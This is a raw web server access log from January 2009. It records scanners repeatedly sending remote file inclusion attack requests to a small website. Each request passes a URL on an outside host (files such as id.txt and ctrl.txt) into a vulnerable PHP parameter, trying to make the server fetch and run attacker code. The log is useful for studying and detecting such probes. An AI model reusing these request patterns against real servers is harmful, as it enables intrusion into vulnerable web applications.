116.122.158.46 - - [04/Jan/2009:18:25:48 -0800] "GET /logs//print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:49 -0800] "GET /logs/access_080901.log//include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:50 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:51 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:52 -0800] "GET /logs/access_080901.log//include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:53 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:54 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:55 -0800] "GET /logs/access_080901.log//print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:55 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:56 -0800] "GET /logs//print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:26:27 -0800] "GET /logs/access_080901.log///homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:26:28 -0800] "GET //homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:26:28 -0800] "GET /logs///homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:26:37 -0800] "GET //homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:26:43 -0800] "GET /logs///homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:26:43 -0800] "GET //homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
81.208.9.229 - - [04/Jan/2009:18:27:56 -0800] "GET /logs/access.log//?sIncPath=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
81.208.9.229 - - [04/Jan/2009:18:27:56 -0800] "GET /?sIncPath=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
81.208.9.229 - - [04/Jan/2009:18:27:56 -0800] "GET /logs//?sIncPath=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 2659 "-" "libwww-perl/5.803" "www.vspeaking.com"
208.80.194.36 - - [04/Jan/2009:18:28:06 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Flood City User; SV1)" "vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:28:19 -0800] "GET /logs/access_080901.log//includes/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:28:20 -0800] "GET /includes/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:28:20 -0800] "GET /logs//includes/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:29:14 -0800] "GET /logs///homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:29:15 -0800] "GET //homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:18:29:16 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:18:29:16 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:18:29:37 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:29:40 -0800] "GET /logs/access.log///homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:29:40 -0800] "GET //homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:29:40 -0800] "GET /logs///homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:18:31:07 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:18:31:07 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:50 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:50 -0800] "GET /logs/access_081208.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:50 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:50 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:52 -0800] "GET /logs/access_081208.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:52 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:52 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.8 - - [04/Jan/2009:18:33:52 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:18:33:57 -0800] "GET /logs/access_080901.log///homepage.php?sel=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:18:35:49 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:18:35:49 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.235.245.121 - - [04/Jan/2009:18:35:49 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.198.92.34 - - [04/Jan/2009:18:38:21 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
200.198.92.34 - - [04/Jan/2009:18:38:21 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
200.198.92.34 - - [04/Jan/2009:18:38:21 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:38:28 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:38:28 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:41:56 -0800] "GET /logs//errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:41:56 -0800] "GET /errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:44:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:44:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:44:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:46:15 -0800] "GET /logs//errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:46:15 -0800] "GET /errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
141.85.37.5 - - [04/Jan/2009:18:47:51 -0800] "GET /logs/send_reminders.php?includedir=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
141.85.37.5 - - [04/Jan/2009:18:47:58 -0800] "GET /send_reminders.php?includedir=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:48:15 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:48:38 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:48:38 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:48:38 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:18:50:47 -0800] "GET /logs/send_reminders.php?includedir=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:18:50:47 -0800] "GET /send_reminders.php?includedir=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:18:51:37 -0800] "GET /logs/send_reminders.php?includedir=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:18:51:38 -0800] "GET /send_reminders.php?includedir=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:52:45 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:52:46 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:53:45 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:53:49 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
202.60.67.10 - - [04/Jan/2009:18:54:09 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
202.60.67.10 - - [04/Jan/2009:18:54:09 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mhasbi.com/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
202.60.67.10 - - [04/Jan/2009:18:54:09 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:55:11 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:55:11 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:55:11 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
190.128.163.42 - - [04/Jan/2009:18:55:23 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.128.163.42 - - [04/Jan/2009:18:55:23 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.128.163.42 - - [04/Jan/2009:18:55:27 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:56:34 -0800] "GET /logs/access_080915.log//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
220.95.214.91 - - [04/Jan/2009:18:58:04 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
220.95.214.91 - - [04/Jan/2009:18:58:05 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.214.51.146 - - [04/Jan/2009:18:59:35 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
85.214.51.146 - - [04/Jan/2009:18:59:35 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:18:59:47 -0800] "GET /logs/access_081208.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
85.236.53.4 - - [04/Jan/2009:19:00:14 -0800] "GET /logs/access_081208.log//?spaw_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.236.53.4 - - [04/Jan/2009:19:00:14 -0800] "GET /logs//?spaw_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 200 2659 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.236.53.4 - - [04/Jan/2009:19:00:14 -0800] "GET /?spaw_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:02:39 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:02:39 -0800] "GET /config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:02:40 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
220.95.214.91 - - [04/Jan/2009:19:05:18 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
220.95.214.91 - - [04/Jan/2009:19:05:19 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:19:05:41 -0800] "GET /logs/access.log//errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.236.53.4 - - [04/Jan/2009:19:06:44 -0800] "GET /logs/access.log//?spaw_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:10:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:10:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:10:20 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:10:20 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:10:20 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:10:20 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:10:55 -0800] "GET /logs/access_080915.log//config/dbutil.bck.php?confdir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:19:16:18 -0800] "GET /logs//ashnews.php?pathtoashnews=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:19:16:18 -0800] "GET /ashnews.php?pathtoashnews=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
222.236.47.182 - - [04/Jan/2009:19:17:23 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.236.47.182 - - [04/Jan/2009:19:17:23 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.236.47.182 - - [04/Jan/2009:19:17:23 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.199.205.47 - - [04/Jan/2009:19:17:27 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
200.199.205.47 - - [04/Jan/2009:19:17:27 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:17:32 -0800] "GET /logs/access_080908.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:17:32 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:17:32 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
200.199.205.47 - - [04/Jan/2009:19:17:36 -0800] "GET /logs/access_081208.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
200.199.205.47 - - [04/Jan/2009:19:17:49 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
216.180.251.146 - - [04/Jan/2009:19:19:37 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
193.86.246.132 - - [04/Jan/2009:19:19:38 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
193.86.246.132 - - [04/Jan/2009:19:19:38 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 2654 "-" "libwww-perl/5.813" "www.vspeaking.com"
